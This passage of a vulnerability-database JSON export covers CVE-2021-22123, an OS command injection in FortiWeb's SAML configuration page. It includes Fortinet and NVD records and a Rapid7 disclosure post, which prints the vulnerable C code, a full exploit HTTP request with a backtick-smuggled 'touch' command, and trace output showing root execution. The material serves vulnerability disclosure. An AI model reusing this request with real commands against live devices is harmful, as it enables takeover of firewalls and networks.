["EXPLOITPACK:E222442D181419B052AACE6DA4BC8485", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208"]}, {"type": "kitploit", "idList": ["KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:3532211766929466258", "KITPLOIT:965198862441671998", "KITPLOIT:6516544912632048506", "KITPLOIT:5829195600312197311", "KITPLOIT:2686676167278919598", "KITPLOIT:7070039119688478663", "KITPLOIT:816704453339226193", "KITPLOIT:1244156083583318186", "KITPLOIT:2722328714476257207", "KITPLOIT:763105754466120590", "KITPLOIT:4425790137948714912", "KITPLOIT:119877528847056004", "KITPLOIT:5376485594298165648"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134"]}, {"type": "dsquare", "idList": ["E-691"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147"]}, {"type": "mssecure", "idList": ["MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mmpc", "idList": ["MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}], "modified": "2021-08-19T08:37:47", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-08-19T08:37:47", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"]}], "fortinet": [{"id": "FG-IR-21-116", "hash": "35621dad7ce920fafe73fa508b5be550", "type": "fortinet", "bulletinFamily": "software", "title": "FortiWeb - OS command injection vulnerability", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated administrator to execute arbitrary commands on the system via the SAML server configuration page. \n", "published": "2021-08-18T00:00:00", "modified": "2021-08-18T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.fortiguard.com/psirt/FG-IR-21-116", "reporter": "FortiGuard Labs", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-10-18T15:25:03", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-20-120"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}], "modified": "2021-10-18T15:25:03", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-10-18T15:25:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "6.4.0", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.14", "operator": "le", "name": "fortiweb"}, {"version": "6.2.4", "operator": "le", "name": "fortiweb"}], "_object_type": "robots.models.fortinet.FortinetBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.fortinet.FortinetBulletin"]}, {"id": "FG-IR-20-120", "hash": "e09ac11479d690f3a64dab512f4ff1d3", "type": "fortinet", "bulletinFamily": "software", "title": "FortiWeb - OS command injection vulnerability", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page. \n", "published": "2021-06-01T00:00:00", "modified": "2021-06-01T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.fortiguard.com/psirt/FG-IR-20-120", "reporter": "FortiGuard Labs", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-10-18T15:26:23", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "fortinet", "idList": ["FG-IR-21-116"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}], "modified": "2021-10-18T15:26:23", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-10-18T15:26:23", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "6.3.7", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.6", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.5", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.4", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.3", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.2", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.1", "operator": "eq", "name": "fortiweb"}, {"version": "6.3.0", "operator": "eq", "name": "fortiweb"}, {"version": "6.2.3", "operator": "eq", "name": "fortiweb"}, {"version": "6.2.2", "operator": "eq", "name": "fortiweb"}, {"version": "6.2.1", "operator": "eq", "name": "fortiweb"}, {"version": "6.2.0", "operator": "eq", "name": "fortiweb"}, {"version": "6.1.2", "operator": "eq", "name": "fortiweb"}, {"version": "6.1.1", "operator": "eq", "name": "fortiweb"}, {"version": "6.1.0", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.7", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.6", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.5", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.4", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.3", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.2", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.1", "operator": "eq", "name": "fortiweb"}, {"version": "6.0.0", "operator": "eq", "name": "fortiweb"}, {"version": "5.9.1", "operator": "eq", "name": "fortiweb"}, {"version": "5.9.0", "operator": "eq", "name": "fortiweb"}], "_object_type": "robots.models.fortinet.FortinetBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.fortinet.FortinetBulletin"]}], "rapid7blog": [{"id": "RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "hash": "26c55203167383f8106cf894e46c4336", "type": "rapid7blog", "bulletinFamily": "info", "title": "Fortinet FortiWeb OS Command Injection", "description": "\n\nAn OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of [ CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](<https://cwe.mitre.org/data/definitions/78.html>) and has a CVSSv3 base score of [8.7](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1>). This vulnerability appears to be related to CVE-2021-22123, which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at [the vendor's website](<https://www.fortinet.com/products/web-application-firewall/fortiweb>).\n\n## Credit\n\nThis issue was discovered by researcher [William Vu](<https://twitter.com/wvuuuuuuuuuuuuu>) of Rapid7. It is being disclosed in accordance with Rapid7's [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the \"Name\" field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:\n \n \n int move_metafile(char *path,char *name)\n {\n int iVar1;\n char buf [512];\n int nret;\n snprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = access(buf,0);\n if (iVar1 != 0) {\n snprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = system(buf);\n if (iVar1 != 0) {\n return iVar1;\n }\n }\n snprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n \"Metadata\",&DAT_00212758);\n iVar1 = system(buf);\n return iVar1;\n }\n \n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n \n \n POST /api/v2.0/user/remoteserver.saml HTTP/1.1\n Host: [redacted]\n Cookie: [redacted]\n User-Agent: [redacted]\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: https://[redacted]/root/user/remote-user/saml-user/\n X-Csrftoken: 814940160\n Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\n Content-Length: 3068\n Origin: https://[redacted]\n Dnt: 1\n Te: trailers\n Connection: close\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"q_type\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"name\"\n `touch /tmp/vulnerable`\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"entityID\"\n test\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"service-path\"\n /saml.sso\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-lifetime\"\n 8\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-timeout\"\n 30\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-path\"\n /SAML2/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-path\"\n /SLO/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"flag\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing\"\n disable\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing_val\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\n Content-Type: text/xml\n <?xml version=\"1.0\"?>\n <md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n <md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n <md:KeyDescriptor use=\"signing\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:KeyDescriptor use=\"encryption\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n <md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n </md:IDPSSODescriptor>\n </md:EntityDescriptor>\n -----------------------------94351131111899571381631694412--\n HTTP/1.1 500 Internal Server Error\n Date: Thu, 10 Jun 2021 11:59:45 GMT\n Cache-Control: no-cache, no-store, must-revalidate\n Pragma: no-cache\n Set-Cookie: [redacted]\n X-Frame-Options: SAMEORIGIN\n X-XSS-Protection: 1; mode=block\n Content-Security-Policy: frame-ancestors 'self'\n X-Content-Type-Options: nosniff\n Content-Length: 20\n Strict-Transport-Security: max-age=63072000\n Connection: close\n Content-Type: application/json\n {\"errcode\": \"-651\"}\n \n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n \n \n [pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n [pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n [pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n [pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n \n\nFinally, the results of the 'touch' command can be seen on the local command line of the FortiWeb device:\n \n \n /# ls -l /tmp/vulnerable\n -rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable\n /#\n \n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, Rapid7 researchers were only able to identify less than three hundred total of these devices that appear to be exposing their management interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as [CVE-2020-29015](<https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015>).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](<https://www.fortiguard.com/faq/psirt-contact>)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August\n\n \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2021-08-17T13:58:19", "modified": "2021-08-17T13:58:19", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/", "reporter": "Tod Beardsley", "references": [], "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-08-17T15:14:31", "history": [], "viewCount": 89, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:99335"]}, {"type": "cve", "idList": ["CVE-2021-22123", "CVE-2020-29015"]}, {"type": "githubexploit", "idList": ["ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "fortinet", "idList": ["FG-IR-21-116", "FG-IR-20-124", "FG-IR-20-120"]}], "modified": "2021-08-17T15:14:31", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-17T15:14:31", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"]}], "cve": [{"id": "CVE-2021-22123", "bulletinFamily": "NVD", "title": "CVE-2021-22123", "description": "An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.", "published": "2021-06-01T20:15:00", "modified": "2021-06-10T19:36:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22123", "reporter": "psirt@fortinet.com", "references": ["https://fortiguard.com/advisory/FG-IR-20-120"], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "type": "cve", "lastseen": "2021-06-11T07:40:12", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-22123"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-06-03T07:37:59", "references": [], "rev": 2}, "score": {"modified": "2021-06-03T07:37:59", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 6, "modified": "2021-06-03T07:37:59", "tweets": [{"link": "https://twitter.com/mdalcero/status/1400715159346331650", "text": "/hashtag/Fortinet?src=hashtag_click rilascia aggiornamenti per /hashtag/FortiProxy?src=hashtag_click e /hashtag/FortiWeb?src=hashtag_click\nLe nuove versioni sanano tre vulnerabilit\u00e0, di cui due del 2018.\n\nCVE-2018-13379\nCVE-2018-13382\nCVE-2021-22123\n\nhttps://t.co/vTvC6lGtCO?amp=1"}, {"link": "https://twitter.com/Har_sia/status/1400104944263335937", "text": "CVE-2021-22123 https://t.co/kAtBhxPFwf?amp=1 /hashtag/HarsiaInfo?src=hashtag_click"}, {"link": "https://twitter.com/WolfgangSesin/status/1403092217384816641", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-22123 (fortiweb)) has been published on https://t.co/fVgUAbeti2?amp=1"}, {"link": "https://twitter.com/vulmoncom/status/1400003363195006977", "text": "FortiWeb management interface OS command injection\n\nAffected versions: 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x\n\nhttps://t.co/JsEHSJJqfw?amp=1\n\nCVE-2021-22123 /hashtag/Vulmon?src=hashtag_click /hashtag/FortiWeb?src=hashtag_click"}, {"link": "https://twitter.com/vulmoncom/status/1400003363195006977", "text": "FortiWeb management interface OS command injection\n\nAffected versions: 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x\n\nhttps://t.co/JsEHSJJqfw?amp=1\n\nCVE-2021-22123 /hashtag/Vulmon?src=hashtag_click /hashtag/FortiWeb?src=hashtag_click"}, {"link": "https://twitter.com/www_sesin_at/status/1403092203270983684", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-22123 (fortiweb)) has been published on https://t.co/q7YNIbdxOc?amp=1"}]}}, "extraReferences": [{"name": "https://fortiguard.com/advisory/FG-IR-20-120", "refsource": "CONFIRM", "tags": [], "url": "https://fortiguard.com/advisory/FG-IR-20-120"}], "hash": "91634cb4b9a5a80304fe407bedb9750aa515803c0b744361df5c167634bc8ddb", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "8adff3bd6ff340d5d16b4fd7d021c516", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ad324692a624604167b22610c416013b", "key": "extraReferences"}, {"hash": "8f9566aa5bdc7cf750f94851ab8e4108", "key": "href"}, {"hash": "ae229be003b156ba34f8082f2d154657", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "c640c55a311aa3b9f706bd0f4e92d1ca", "key": "references"}, {"hash": "88e192d3d83d08064d987c8b035fa109", "key": "published"}, {"hash": "4840c5df25a3fd37270aff0a5831164e", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "86e39bacc290416bdfa3d5a723b3f1d1", "key": "description"}, {"hash": "292cbc6028be005a3731b50fb0919e2f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22123", "id": "CVE-2021-22123", "immutableFields": [], "lastseen": "2021-06-03T07:37:59", "modified": "2021-06-01T20:16:00", "objectVersion": "1.5", "published": "2021-06-01T20:15:00", "references": ["https://fortiguard.com/advisory/FG-IR-20-120"], "reporter": "psirt@fortinet.com", "title": "CVE-2021-22123", "type": "cve", "viewCount": 14}, "different_elements": ["extraReferences", "cvss", "cvss3", "cvss2", "modified", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 2, "lastseen": "2021-06-03T07:37:59"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-22123"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-06-02T07:39:19", "references": [], "rev": 2}, "score": {"modified": "2021-06-02T07:39:19", "rev": 2, "value": 6.4, "vector": "NONE"}, "twitter": {"counter": 3, "modified": "2021-06-02T07:39:19", "tweets": [{"link": "https://twitter.com/Har_sia/status/1400104944263335937", "text": "CVE-2021-22123 https://t.co/kAtBhxPFwf?amp=1 /hashtag/HarsiaInfo?src=hashtag_click"}, {"link": "https://twitter.com/vulmoncom/status/1400003363195006977", "text": "FortiWeb management interface OS command injection\n\nAffected versions: 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x\n\nhttps://t.co/JsEHSJJqfw?amp=1\n\nCVE-2021-22123 /hashtag/Vulmon?src=hashtag_click /hashtag/FortiWeb?src=hashtag_click"}, {"link": "https://twitter.com/vulmoncom/status/1400003363195006977", "text": "FortiWeb management interface OS command injection\n\nAffected versions: 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x\n\nhttps://t.co/JsEHSJJqfw?amp=1\n\nCVE-2021-22123 /hashtag/Vulmon?src=hashtag_click /hashtag/FortiWeb?src=hashtag_click"}]}}, "extraReferences": [{"name": "https://fortiguard.com/advisory/FG-IR-20-120", "refsource": "CONFIRM", "tags": [], "url": "https://fortiguard.com/advisory/FG-IR-20-120"}], "hash": "2530d10bf9a2b5db8bee95058e707453f0b77ffc7fcc61bfd300c479ff872a28", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "8adff3bd6ff340d5d16b4fd7d021c516", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "ad324692a624604167b22610c416013b", "key": "extraReferences"}, {"hash": "8f9566aa5bdc7cf750f94851ab8e4108", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "c640c55a311aa3b9f706bd0f4e92d1ca", "key": "references"}, {"hash": "88e192d3d83d08064d987c8b035fa109", "key": "published"}, {"hash": "4840c5df25a3fd37270aff0a5831164e", "key": "cvelist"}, {"hash": "88e192d3d83d08064d987c8b035fa109", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "86e39bacc290416bdfa3d5a723b3f1d1", "key": "description"}, {"hash": "292cbc6028be005a3731b50fb0919e2f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22123", "id": "CVE-2021-22123", "immutableFields": [], "lastseen": "2021-06-02T07:39:19", "modified": "2021-06-01T20:15:00", "objectVersion": "1.5", "published": "2021-06-01T20:15:00", "references": ["https://fortiguard.com/advisory/FG-IR-20-120"], "reporter": "psirt@fortinet.com", "title": "CVE-2021-22123", "type": "cve", "viewCount": 12}, "different_elements": ["modified"], "edition": 1, "lastseen": "2021-06-02T07:39:19"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d6787ce0f153511ac00b42411af1de42"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": 